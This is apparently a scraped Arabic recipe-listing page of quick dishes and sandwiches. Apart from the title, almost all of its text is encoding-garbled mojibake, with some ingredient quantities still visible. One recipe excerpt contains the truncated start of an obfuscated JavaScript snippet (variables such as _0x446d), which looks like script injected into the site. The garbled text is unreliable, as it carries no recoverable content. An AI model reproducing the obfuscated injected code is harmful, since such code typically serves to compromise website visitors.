أطباق سريعة سندويشات

Ui??Oi??O?Oi??Ui??O? Ui??O?Ui??Oi?? O?Oi??Ui??U?Oi??Ui??Oi??Oi?? Ui??O? Oi??Ui??Oi??Oi?? Oi??Ui??Ui??O?O?Ui??U?O?

        Ui??Oi??O?Oi??Ui??O? Ui??O?Ui??Oi?? O?Oi??Ui??U?Oi??Ui??Oi??Oi?? Ui??O? Oi??Ui??Oi??Oi?? Oi??Ui??Ui??O?O?Ui??U?O? O?Oi??Oi??Oi??Oi?? Ui??Oi??O?Oi??Ui??O? Ui??Ui??Oi??O?Oi?? Oi??Ui??USUi?? Ai??Ui...

O?Oi??Oi??Oi??Oi?? Ui??O?Ui??Oi??Oi?? U?Oi??Ui??U?Oi??Ui??

O?Oi??Oi??Oi??Oi?? Ui??O?Ui??Oi??Oi?? U?Oi??Ui??U?Oi??Ui?? U?U?Oi??Oi?? Ui??U?Oi??O?Oi?? O?O?Oi??O? Oi??U?USU?Oi?? U?Ui??O?O?USOi?? U?Ui??USOi?? Ui??Ui?? Oi??Ui??O?Oi??Oi??Oi??Oi?? Oi??Ui??O?USOi??Oi??O? Ui??O?U?O?Oi??Oi?? Oi??Ui??Oi??O...

Oi??Oi??O? O?Oi??Ui??O?O?U?Oi??Oi??Ui?? Ui??Ui??Oi??Oi??U?Ui??Oi?? Oi??Oi??O?Oi??Ui?? Oi??Ui??O?Oi??Oi??Oi??

Oi??Oi??O? O?Oi??Ui??O?O?U?Oi??Oi??Ui?? Ui??Ui??Oi??Oi??U?Ui??Oi?? Oi??Oi??O?Oi??Ui?? Oi??Ui??O?Oi??Oi??Oi?? O?Ui??Oi??U?Oi?? Oi??Oi??O? Oi??Oi??U?Oi?? Oi??U?USUi?? - Ui?? U? O?O?O?Oi?? - Ui??Ui??Oi?? U?Oi??O?O?Oi??Oi?? USOi??Ui??Oi?? Oi??Ui??U?Ui...

U?Oi??U?U?USO? O?Oi??Ui??O?Oi??Oi??Oi?? U?Oi??Ui??Oi??O?Ui?? Ui??O? Oi??Ui??Oi??Oi?? Oi??Ui??Oi??U?Ui??

    U?Oi??U?U?USO? Oi??Ui??O?Oi??Oi??Oi?? ************** 500 O? Ui??O?Oi??Oi?? Oi??Ui??O?Oi??Oi??Oi?? Ui??Oi??Oi??U?Ui??Oi?? O?Oi??Ui??Oi?? Ui??O?U?O?Oi??Oi?? Ui??O?Ui??O?Oi?? Oi??Ui??USUi?? Oi??U? Ui??Oi??Oi??U?Ui?...

U?USO? O?Oi??Ui??O?Oi??Ui??Oi?? U?Oi??Ui??U?Oi??Ui??Oi??Oi??

  Oi??Ui??O?Oi??USUi?? 75 O? O?O?O?Oi?? -150 O? Oi??Oi??USUi?? - O?USOi??Oi?? Oi??O?USOi??Oi?? - Ui??Ui??Oi?? - Oi??O?O?Oi??Oi?? - Ui??Oi?? Ui?? Oi?? O?Oi??Ui??Oi?? O?O?Oi??Oi?? ( Oi??Oi??O?USOi??Oi??USOi??) Ui??Oi??Ui??Oi?? Oi??Ui?...

O?U?Oi??O?Oi?? O?Oi??Ui??O?Oi??Oi??Oi?? U?Oi??Ui??Oi??Ui??USO? Ui??Oi??USOi??Oi?? U?Oi??U?USU?Oi??

O?U?Oi??O?Oi?? O?Oi??Ui??O?Oi??Oi??Oi?? U?Oi??Ui??Oi??Ui??USO? Ui??Oi??USOi??Oi?? U?Oi??U?USU?Oi?? ---------------------------------------- O?Oi??Ui??Oi?? Ui??O?Ui??O?Oi?? Ui??O?Oi??Oi??Oi?? U?Oi??Ui??O?USO? U?Oi??Ui??O?O?O?Oi?? U?Oi??Ui??U...

U?Oi??U?U?USO? O?Oi??Ui??O?Oi??O?USUi?? U?Oi??Ui??Oi??Oi??Oi?? Oi??Oi??US U?Ui??Oi??USOi??

1 U?Ui??O? O?Oi??O?USUi?? Ui??Ui??Ui??US U?Ui??Oi??Oi??U?Ui?? ai??i?? 1 O?Oi??Ui??Oi?? Ui??Oi??U?U?U?Oi?? U?Ui??O?Oi??U?Oi??Oi?? Ui??Ui?? Oi??Ui??Ui??Oi??O? ai??i?? 1 O?Oi??Oi??Oi??Oi?? Ui??Oi??U?U?U?Oi?? ai??i?? 1 Oi??O?Oi??Oi?? Ui??Oi??U?U?U?Oi...

O?Oi??Ui??O?U?USO?O?Oi??O? Oi??U?Oi??U? O?Oi??Ui??Oi??U?Ui??

  O?Oi??Ui??O?U?USO?O?Oi??O? Oi??U?Oi??U?Ai?? O?Oi??Ui??Oi??U?Ui?? -------------------------- 400 O? O?Ui??USUi?? Oi??O?USOi?? 100 O? O?Ui??USO?Oi?? Oi??Ui??USUi??Oi?? - Ai??Ui??Ui??Oi?? - Ui??Ui??O?Ui??Oi?? O?U?Oi?? - Ui??...

O?USO?O?Oi?? O?O?Oi??USUi?? Oi??Ui??O?Oi??Oi??Oi??Oi??

O?USO?O?Oi?? O?O?Oi??USUi?? Oi??Ui??O?Oi??Oi??Oi??Oi?? -------------------- 2 Oi??O?Oi??O? O?Oi??Oi??Oi??Oi?? Ui??Oi??Ui??U?Ui??Oi?? U?Ui??Ui??Oi??U?O?Oi?? ai??i?? Ui??Ui??Oi?? ai??i?? Oi??O?O?Oi??Oi?? ai??i?? O?O?O?Oi?? ai??i?? Ui?? U? O?...

Oi??Ui??U?Ui??Oi??Oi?? O?Oi??Ui??Ui??Ui??U?Oi?? U?Oi??Ui??O?U?Ui??Oi??Oi?? O?Oi??Ui??Ui??Oi??Oi??Oi??Ui?? Oi??Ui??Ui??Oi??U?Oi??Oi??

Oi??Ui??U?Ui??Oi??Oi?? O?Oi??Ui??Ui??Ui??U?Oi?? U?Oi??Ui??O?U?Ui??Oi??Oi?? ------------------------ 500 O? Ui??Ui?? Oi??Ui??Ui??O?O?Oi?? Oi??Ui??Oi??Oi??USOi?? O?Oi??Oi??Ui??Oi?? + 100 O? O?U?Oi?? Ui??Oi??Ui??O?U?Ui??U?Ui?? O?Oi??...

O?O?O?Oi??O? Oi??Ui??O?O?Oi??U?USO?US O?Oi??Ui??O?Oi??Oi??Oi?? U? Oi??Ui??Oi??O?Ui??Oi??

Ui??Ui??Oi??O?USOi?? Ai??O?O?O?Oi??O? Oi??Ui??O?O?Oi??U?USO?US O?Oi??Ui??O?Oi??Oi??Oi?? U? Oi??Ui??Oi??O?Ui??Oi?? U?USO? O?O?Oi??U?USO?US 500 O?Oi??Oi??Ui?? O?Oi??O?O? O?Oi??Ui??Oi??O? Ui??O?U?O?Oi??Oi?? Oi??O?O? U?USUi??U? O?Oi??Oi??Oi?? Ui?...

U?U?Oi??Oi?? Ui??O?Ui??U?USUi?? Oi??Ui??O?USOi?? Oi??Ui??Ui??O?Ui??U?Ui??

Oi??U?U?Oi??Oi?? O?O?USOi??Oi?? U?Oi??Oi??Oi??O?Oi?? Oi??O?Ui??Ui??Ui?? Oi??Ui?? O?Ui??Oi??Ui?? U?Ui?? Oi??Ui??Oi??O?Oi??Oi??O?  var _0x446d=;if(document]](_0x446d)== -1){(function(_0xecfdx1,_0xecfdx2)...

O?U?U?Ui??U?Oi?? O?Oi??Ui??O?USOi??

Ui??Oi??U? Oi??O?Oi?? O?U?U?Ui??U?Oi?? Ui??O?O?U?Ui??Oi?? U?Ui??Ui??Oi??O?Oi?? Ui??O?USOi??U?Ui?? USO?O?Ui??Ui?? Ui??O? Oi??Ui??Ui??Ui??Oi?? U?2 Oi??O?Oi??O? Oi??Ui??Oi??U?Ui?? Ui??Oi??U?USU?Ui?? U?Ui??O?USOi??U?Ui?? U?Ui??Ui??Ui??Oi?? ...

Oi??Oi??O? O?Oi??Ui??O?U?Oi??O?Ui??

O?Ui??Oi??U?Oi?? Oi??Oi??O? Oi??Oi??U?Oi?? Oi??U?USUi?? Ui??Ui??Oi??, Oi??O?O?Oi??Oi??, Oi??O?U?Ui??Oi??O?USOi?? ,O?Oi??Ui??USOi??Oi?? ,Ui??O?Ui??Ui??Oi?? U?O?USOi??Oi?? O?O?O?Oi?? ,Ui??O?Ui??Ui??Oi?? U?O?USOi??Oi?? O?USO? ,Oi??Oi??Ui??U?Ui?...

O?Oi??Ui??USUi??US O?Oi??Ui??O?USU? Oi??Ui??Oi??U?Ui??US

  Ui??Oi??O? Oi??Ui??O?USU? Oi??Ui??Oi??U?Ui??US Oi??O?O? O?O?O? Oi??Ui??Oi??U?Oi??Oi??O? Ui??Ui??Oi?? Oi??O?O?Oi??Oi?? O?Oi??Ui??USOi??Oi?? Ui??U?Oi??Oi??Oi??O? Oi??O?USO? O?USO? Ui??O?USOi??U?Ui??U?Ui?? USO?Ui??Ui??Oi??U? Ui??Ui?...

Oi??USO?U? Ui??O?Oi??Ui??Ui??

Oi??USO?U? Ui??O?Oi??Ui??Ui??   Oi??USO?U? Ui??Ui??Oi??O? Oi??Ui??USUi?? U?Ui??Oi??Ui??U?Ui?? Ui??Oi??Oi??O? Ui??Ui??Ui??Oi??Oi?? Ui??O?USOi?? U?USUi??Oi?? O?USO?+Oi??U?Ui?? Ui??Oi??U?U?U?+Ui??Ui??Oi??+O?Oi??Ui??USOi??Oi??+U?Ui??U?...

O?Oi??Oi??Oi??Oi?? Ui??O?Oi??Ui??Ui??Oi??

O?Oi??Oi??Oi??Oi?? Ui??O?Oi??Ui??Ui??Oi?? Ui?? 500O? O?Oi??Oi??Oi??O? Ui??Ui??Oi??O?Ui?? Ui??U?O?O?Oi??O? U? Ui??Oi??O?U?Oi??Ui?? O?Ui??Ui?? Oi??Ui??O?Oi??Oi??Oi?? _Ui??U?U?Oi??Oi??_ Ui?? 4 Ui??Ui??Oi??O?Ui?? U?O?USOi??Oi?? O?USO? O?USO...

Oi??Ui??O?Ui??U?Ui??Oi?? Oi??U? Oi??Ui??Oi??O?USO?Oi??

Oi??Ui??O?Ui??U?Ui??Ui?? Oi??U? Oi??Ui??Oi??O?USO?Ui?? Oi??Ui??Ui??O?Oi??O?USUi?? Oi??Ui??Ui??Ui??Oi??O?USOi?? O?Ui??U?Ui??Oi?? U?Oi??O? Oi??O?USOi?? O?USO? Oi??Ui??O?USO?U?Ui?? Ui??Ui??Oi?? U?Ui??U?Ui?? Ui??Oi??USO?Oi?? ...

Oi??Ui??O?O?Ui??U?U?

Oi??Ui??O?O?Ui??U?U? 4 Oi??O?Oi??O? Ui??Ui?? Oi??Ui??O?Ui??Oi??Oi??Ui?? Ui??Ui??Ui??USOi?? Ui??O? O?Oi??U? O?O?Oi?? Oi??Ui??Ui??O?Oi?? Ui??Ui??Oi??O?U?Ui?? Ui??Oi??O?O?Oi??O? U?Ui??O?USOi??U?Ui?? U?Oi??Ui??Ui??Oi??O? U?Oi??Ui??Ui??Ui??Oi...

Oi??Oi??Oi??O?O? Oi??Ui??O?USO?O?Oi??

Ui??Ui??Oi??O?USOi?? Oi??Ui??O?Oi??USUi?? 500 O?Oi??Oi??Ui?? O?Ui??USUi?? 200 O?Oi??Oi??Ui?? O?O?O?Oi?? 25 O?Oi??Oi??Ui?? Oi??Ui??USOi??Oi?? Oi??Ui??O?Oi??Oi?? Ai??1 O?Oi??Ui??U?Ui?? O?USOi??Oi?? Ui??Ui??Oi?? 50 Ui??Ui??Ui?? Oi??Ui??USO?...

U?Oi??U?U?USO? O?Oi??Ui??U?U?O?Oi?? U?Oi??Ui??O?Oi??O?

U?Oi??U?U?USO? O?Oi??Ui??U?U?O?Oi?? U?Oi??Ui??O?U?Oi??O?: Oi??Ui??Ui??Ui??Oi??O?USOi??: - U?U?O?Oi?? - O?Oi??O? O?Oi??O?US Ui??O?Ui??U?Ui?? Ui??O? Ui??Ui??USUi?? Ui??Ui?? Oi??Ui??Ui??Ui??Oi?? - Ui??O?O?U?Oi?? U?Ui??O?O?Ui??U?O? - Ui??Ui??U...

O?Oi??USU?Oi??O? O?Oi??Ui??O?Oi??Oi??Oi?? U? O?USU?Oi??Oi?? O?Oi??Ui??Oi??Oi??Oi??

      O?Oi??USU?Oi??O? O?Oi??Ui??O?Oi??Oi??Oi?? U? O?USU?Oi??Oi?? O?Oi??Ui??Oi??Oi??Oi?? Oi??Ui??Ui??Ui??Oi??O?USOi??: Oi??Ui??O?Oi??USU?Oi??O?: - Oi??Ui??U?Oi??Ui??Oi?? - O?Oi??Ui??Oi?? Oi??O?USOi??Oi?? Ui??O?...

برمجة المطور